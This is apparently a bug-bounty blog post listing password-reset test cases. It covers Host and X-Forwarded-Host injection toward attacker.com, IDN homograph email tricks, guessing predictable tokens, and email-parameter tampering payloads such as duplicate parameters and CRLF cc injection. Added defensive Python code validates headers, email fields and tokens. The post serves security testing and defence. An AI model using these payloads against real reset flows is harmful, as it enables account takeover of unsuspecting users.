# Forgot/Reset Password Test Cases

### 1. Header Injection

Try the checks below while generating the reset password link.

#### Manipulating Host Header

If there are checks on the original Host header, try bypassing them by adding a second Host value:

```
Host: victim.com
Host: attacker.com
```

#### Adding Custom Headers to the Request

```
X-Forwarded-For: <attacker.com>
X-Forwarded-Host: <attacker.com>
X-Client-IP: <attacker.com>
X-Originating-IP: <attacker.com>
```

> Reference: <https://medium.com/bugbountywriteup/fun-with-header-and-forget-password-with-a-twist-af095b426fb2>
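As an added example (not code from the original post), here is how the server side can make the Host and X-Forwarded-* tricks above inert: the reset link is built from a configured origin, and a duplicated or unexpected Host header is reported. `CANONICAL_ORIGIN`, the forwarding header list and the sample requests are assumptions constructed for the demo.

```python
from urllib.parse import urlencode

# Assumed application config: the only origin reset links may point to. Never read from the request.
CANONICAL_ORIGIN = "https://victim.com"
# Client-controlled forwarding headers that must not influence the link (the post's second trick).
FORWARDING_HEADERS = ("x-forwarded-host", "x-forwarded-for", "x-client-ip", "x-originating-ip")

def check_reset_request(raw_headers):
    """raw_headers: list of (name, value) pairs exactly as received.

    Returns a list of findings; an empty list means the headers are as expected.
    A list rather than a dict is used so that a duplicated Host header stays visible.
    """
    findings = []
    hosts = [v.strip() for n, v in raw_headers if n.lower() == "host"]
    if len(hosts) != 1:
        findings.append("expected exactly one Host header, got %d" % len(hosts))
    expected_host = CANONICAL_ORIGIN.split("//", 1)[1]
    for h in hosts:
        if h.lower() != expected_host:
            findings.append("unexpected Host value: %s" % h)
    for n, v in raw_headers:
        if n.lower() in FORWARDING_HEADERS:
            findings.append("client-supplied forwarding header ignored: %s=%s" % (n, v))
    return findings

def build_reset_link(token):
    """The link is built only from the configured origin, so no request header can redirect it."""
    return "%s/reset?%s" % (CANONICAL_ORIGIN, urlencode({"token": token}))

if __name__ == "__main__":
    # Constructed sample requests mirroring the two tricks in the post.
    dup_host = [("Host", "victim.com"), ("Host", "attacker.com")]
    fwd_host = [("Host", "victim.com"), ("X-Forwarded-Host", "attacker.com")]
    for req in (dup_host, fwd_host):
        print(check_reset_request(req))
    print(build_reset_link("example-token"))
```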

### 2. IDN Homograph Attack [Unicode Normalization]

This attack takes advantage of the fact that characters from different alphabets can look alike. For example, a regular user of example.com may be lured to click a link where the Latin character 'a' is replaced with the Cyrillic character 'а'.

#### Attack Scenario

* Assume the victim has created an account with the email `abc@gmail.com`.
* As the attacker, while generating the password reset, replace the character `a` in `abc@gmail.com` with a similar-looking letter from a different alphabet, such as `á`.
* It is possible that, at the time of reset link generation, the server fails to handle the replaced character and converts it into a different string, e.g. `abc@gmáil.com --> abc@xn--gmil-6na.com`.
* The reset link will then be sent to `abc@xn--gmil-6na.com`.

#### Real-Time Attack

* Create an account with the email `test@gmail.com.burpcollaborator.net`.
* Now generate a reset password link for the email `test@gmáil.com.burpcollaborator.net`.
* Once you receive the password reset mail on the collaborator, look at the domain for any change in the replaced character.

> Reference: <https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization-wp.pdf>

> Reference: <https://medium.com/bugbountywriteup/how-i-was-able-to-change-victims-password-using-idn-homograph-attack-587111843aff>
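An added example, not from the original post, of the defensive check for this case: the submitted address's domain is IDNA-encoded with Python's built-in `idna` codec (which turns `gmáil.com` into `xn--gmil-6na.com`), encoded domains are refused, and the reset mail goes to the address stored with the account rather than to the submitted string. The `ACCOUNTS` dict and the ASCII-only policy are assumptions constructed for the demo.

```python
# Constructed user store; stored addresses are the canonical ASCII form registered at sign-up.
ACCOUNTS = {"abc@gmail.com": {"id": 1, "email": "abc@gmail.com"}}

def canonical_email(addr):
    """Lower-case the address and IDNA-encode the domain part (Python's built-in idna codec)."""
    local, sep, domain = addr.strip().rpartition("@")
    if not sep or not local or not domain:
        raise ValueError("not an e-mail address")
    ascii_domain = domain.encode("idna").decode("ascii")   # 'gmáil.com' -> 'xn--gmil-6na.com'
    return "%s@%s" % (local.lower(), ascii_domain.lower())

def reset_recipient(submitted):
    """Return the stored address the reset mail must go to, or None if the request is refused.

    The mail goes to the address on the account record, never to `submitted`, so a
    look-alike domain cannot divert it; an encoded (xn--) label is refused outright
    because this service only registers ASCII domains (assumed policy).
    """
    key = canonical_email(submitted)
    if any(label.startswith("xn--") for label in key.split("@")[1].split(".")):
        return None
    account = ACCOUNTS.get(key)
    return account["email"] if account else None

if __name__ == "__main__":
    for s in ("abc@gmail.com", "abc@gm\u00e1il.com", "ABC@GMAIL.COM"):
        print("%-22s -> %-24s -> %s" % (s, canonical_email(s), reset_recipient(s)))
```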

### 3. Cryptography Attack

#### Case 1

* Generate the reset link for an account and copy the reset token from the link.
* Check whether it matches any hash algorithm.
* Use the [Hashmash](https://github.com/rebootuser/Hashmash) tool to generate a valid reset token by trying various combinations, e.g. `[timestamp|email|timestamp]`.

#### Case 2

* While generating reset links, use two aliases of one email and look at which bits differ between the reset tokens, e.g. `test+1@gmail.com` and `test+2@gmail.com`.

  **Note**: If you append `+sometext` to your email, it creates an alias of your email, and you will receive all of its mail in your actual inbox.
* Check the reset token and try to see whether any public encoding library or weak encryption is used.

> Reference: <https://www.notsosecure.com/hacking-crypto-fun-profit/>

> Reference: <https://medium.com/bugbountywriteup/weak-cryptography-in-password-reset-to-full-account-takeover-fc61c75b36b9>

### 4. Token Disclosure in Request/Response

While generating a password reset link, always look at the request and its response for any reset token disclosure.

The reset token may also be hard-coded somewhere in JavaScript or disclosed in other requests/responses. To identify this, follow the steps below, quoted from [@hakluke](https://twitter.com/hakluke):

* Set up Burp Suite in browser-1.
* Do a password reset request in browser-1.
* Open the password reset email in browser-2 and copy the token.
* Search your Burp history for the token.

### 5. Tampering User Identification Parameter

* Generate a password reset link for any user account.
* Access the link, enter the new password, and submit the form.
* Capture the request and look for an injection point: an email or any other unique identification parameter that determines whose password will be updated.

### 6. Email Tampering

While generating a reset link for the victim user, try the injections below to get the reset link sent to the attacker's email.

```
#Parameter Pollution
email=victim@gmail.com&email=attacker@gmail.com

#CRLF and SMTP Injection
email=victim@gmail.com%0a%0dcc:attacker@gmail.com

#Padding in JSON Body
{"email":["victim@gmail.com","attacker@gmail.com"]}

#Using Separators
email=victim@gmail.com,attacker@gmail.com
email=victim@gmail.com|attacker@gmail.com
email=victim@gmail.com%20attacker@gmail.com
```
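Added example (not the post's own code): a strict server-side parser for the `email` field that rejects each of the tampering variants listed above, run over bodies constructed from those payloads. `EMAIL_RE`, `RejectedRequest` and the two supported content types are assumptions for the demo.

```python
import json
import re
from urllib.parse import parse_qs

# One local part, one '@', dotted ASCII domain; no separators, whitespace or CR/LF anywhere.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

class RejectedRequest(ValueError):
    pass

def extract_single_email(body, content_type):
    """Return exactly one validated address from a form or JSON body, else raise."""
    if content_type == "application/x-www-form-urlencoded":
        # parse_qs keeps every repeated key, so parameter pollution shows up as a list of 2.
        values = parse_qs(body, keep_blank_values=True, strict_parsing=True).get("email", [])
    elif content_type == "application/json":
        data = json.loads(body)
        if not isinstance(data, dict) or "email" not in data:
            raise RejectedRequest("missing email")
        values = data["email"] if isinstance(data["email"], list) else [data["email"]]
    else:
        raise RejectedRequest("unsupported content type")
    if len(values) != 1:
        raise RejectedRequest("expected exactly one email value, got %d" % len(values))
    value = values[0]
    if not isinstance(value, str) or not EMAIL_RE.fullmatch(value):
        raise RejectedRequest("malformed email")   # catches CRLF, ',', '|', '%20' variants
    return value

def classify(body, content_type):
    """Helper for logging and tests: 'accepted' or the rejection reason."""
    try:
        extract_single_email(body, content_type)
        return "accepted"
    except (RejectedRequest, ValueError) as e:   # json.loads and strict_parsing raise ValueError
        return "rejected: %s" % e

if __name__ == "__main__":
    form = "application/x-www-form-urlencoded"
    samples = [   # constructed from the payloads listed in the post
        ("email=victim@gmail.com", form),
        ("email=victim@gmail.com&email=attacker@gmail.com", form),
        ("email=victim@gmail.com%0a%0dcc:attacker@gmail.com", form),
        ('{"email":["victim@gmail.com","attacker@gmail.com"]}', "application/json"),
        ("email=victim@gmail.com,attacker@gmail.com", form),
        ("email=victim@gmail.com%20attacker@gmail.com", form),
    ]
    for body, ct in samples:
        print(body, "=>", classify(body, ct))
```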

### 7. Reset Link Expiration

Check whether the link expires once it has been used.
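Added example, not from the original post, covering sections 3, 5 and 7 together: an unguessable token from `secrets` beside the predictable `timestamp|email|timestamp` pattern, stored only as a SHA-256 digest, bound to one user id so the reset form cannot name a different account, expiring after `TOKEN_TTL`, and consumed on first use. The in-memory store, injectable clock and TTL value are constructed for the demo.

```python
import hashlib
import secrets
import time

TOKEN_TTL = 15 * 60          # seconds; assumed policy value for the demo

class ResetTokenStore:
    """Constructed in-memory store: sha256(token) -> {user_id, expires_at, used}."""

    def __init__(self, now=time.time):
        self._now = now      # injectable clock so expiry can be tested
        self._rows = {}

    def issue(self, user_id):
        """Return a fresh unguessable token; the server keeps only its hash (section 3)."""
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, no structure to reverse
        self._rows[self._digest(token)] = {
            "user_id": user_id, "expires_at": self._now() + TOKEN_TTL, "used": False}
        return token

    def consume(self, token):
        """Validate and burn a token; return the bound user id, or None.

        The caller updates the password of the returned user id only, never of an
        email or id supplied in the reset form (section 5).
        """
        row = self._rows.get(self._digest(token))
        if row is None or row["used"] or self._now() > row["expires_at"]:
            return None
        row["used"] = True                  # single use, so a replayed link fails (section 7)
        return row["user_id"]

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

def weak_token(email, ts):
    """The pattern section 3 warns about: fully determined by a timestamp and the email."""
    return hashlib.sha256(("%d|%s|%d" % (ts, email, ts)).encode()).hexdigest()

if __name__ == "__main__":
    clock = [1_000_000]
    store = ResetTokenStore(now=lambda: clock[0])
    t = store.issue(user_id=42)
    print("first use:", store.consume(t))   # 42
    print("second use:", store.consume(t))  # None
    print("weak token reproducible:",
          weak_token("test@gmail.com", 1_000_000) == weak_token("test@gmail.com", 1_000_000))
```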

Thanks for reading :)

Follow me on Twitter [@0xAyub](https://twitter.com/0xAyub) for more notes.

